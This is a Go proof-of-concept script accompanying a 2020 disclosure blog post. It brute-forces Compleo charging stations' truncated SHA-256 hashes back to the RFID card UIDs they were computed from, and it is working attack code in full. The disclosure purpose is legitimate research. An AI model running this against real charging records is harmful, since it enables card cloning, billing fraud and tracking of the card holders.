/*
* PoC for Compleo's SAM UID hashing
* Copyleft 2020 by Mathias Dalheimer
* Please refer to https://gonium.net/blog/2020/02/14/kaputt-bleibt-kaputt/
* for more details.
*
* Documents of Compleo CS confirm that this procedure is correct, and
* the numbers (UID and hash) used below stem from a Compleo CS document.
 */

package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"github.com/gosuri/uiprogress"
	"os"
	"strings"
	"sync"
	"time"
)

/*
* To run, you need to install a working Go environment (see
* https://golang.org/doc/install). Then:
* $ go get "github.com/gosuri/uiprogress"
* $ go run compleo_poc.go
 */

func main() {
	/* Strangely, the example mentioned above uses a string to represent
	* the UID. Lets check our knowledge of the UID encoding.
	 */
	fmt.Println("0 -- Checking my understanding of Compleo's UID encoding")
	// The example interprets the bytes as a string value,
	// Those are not hex numbers.
	//demo_uid := []byte{0x0b, 0x2b, 0xd6, 0xc9}
	demo_uid := []byte("000522E817C2")
	demo_hash := sha256.Sum256(demo_uid)
	fmt.Printf("UID %s (% x) hashes to % x\n", demo_uid, demo_uid, demo_hash)

	target_hash, err := hex.DecodeString("402142E8E0BCE2AE88")
	if err != nil {
		fmt.Println("Failed to convert target hash: ", err.Error())
		os.Exit(-1)
	}
	cmp_res := bytes.Compare(target_hash, demo_hash[0:9])
	if cmp_res == 0 {
		fmt.Printf("Equal: TARGET_HASH % x and DEMO_HASH[0:9] % x\n", target_hash,
			demo_hash[0:9])
	}

	/* Now, we can use this knowledge to run a brute-force attack. Change
	* the target_hash value to the UID string you would like to attack.
	 */
	target_hash, err = hex.DecodeString("402142E8E0BCE2AE88")
	if err != nil {
		fmt.Println("Failed to convert target hash: ", err.Error())
		os.Exit(-1)
	}

	fmt.Println("\n1 -- Brute forcing hash->UID association")
	// enumerate all hashes
	fmt.Printf("Searching for the UID associated with hash % x\n", target_hash)
	start := time.Now()
	//bar := uiprogress.AddBar(256 * 256 * 256).PrependElapsed().AppendCompleted()
	bar := uiprogress.AddBar(256 * 256).PrependElapsed().AppendCompleted()
	uiprogress.Start()
	var wg sync.WaitGroup
	for outer_uid3 := 0; outer_uid3 < 256; outer_uid3++ {
		// Go parallel (256 goroutines)
		wg.Add(1)
		go func(uid3 int) {
			defer wg.Done()
			for uid2 := 0; uid2 < 256; uid2++ {
				for uid1 := 0; uid1 < 256; uid1++ {
					//	for uid0 := 0; uid0 < 256; uid0++ {
					// here we cheat a little bit: The UID in Compleos
					// documentation contains six bytes (Mifare cards have
					// either four or seven, but anyway. We set the first
					// ("00") and the last two bytes ("17C2") statically here
					// to reduce computation time. But it really doesn't matter: My
					// old desktop machine needs 12 minutes to enumerate all
					// four-byte hashes. A CUDA implementation would be much
					// faster, so seven-byte hashes should not be an issue.
					egb_compleo_uid := strings.ToUpper(
						fmt.Sprintf("00%02x%02x%02x17C2", uid3, uid2, uid1))
					buffer := []byte(egb_compleo_uid)
					hash := sha256.Sum256(buffer)
					//fmt.Printf("at %s (% x) -> % x\n", egb_compleo_uid, buffer)
					//fmt.Printf("% x\n% x\n% x\n", target_hash, hash, hash[0:9])
					cmp_res := bytes.Compare(target_hash[0:8], hash[0:8])
					if cmp_res == 0 {
						fmt.Printf("Found UID %s (% x) for hash % x\n",
							egb_compleo_uid, buffer, target_hash)
						elapsed := time.Since(start)
						fmt.Printf("Calculation took %s\n", elapsed)
						os.Exit(0)
					}
				}
				bar.Incr()
			}
		}(outer_uid3) // end of go func()
	}
	wg.Wait()
	uiprogress.Stop()
	elapsed := time.Since(start)
	fmt.Printf("Enumerated all UIDS: calculation took %s\n", elapsed)
	os.Exit(1)
}
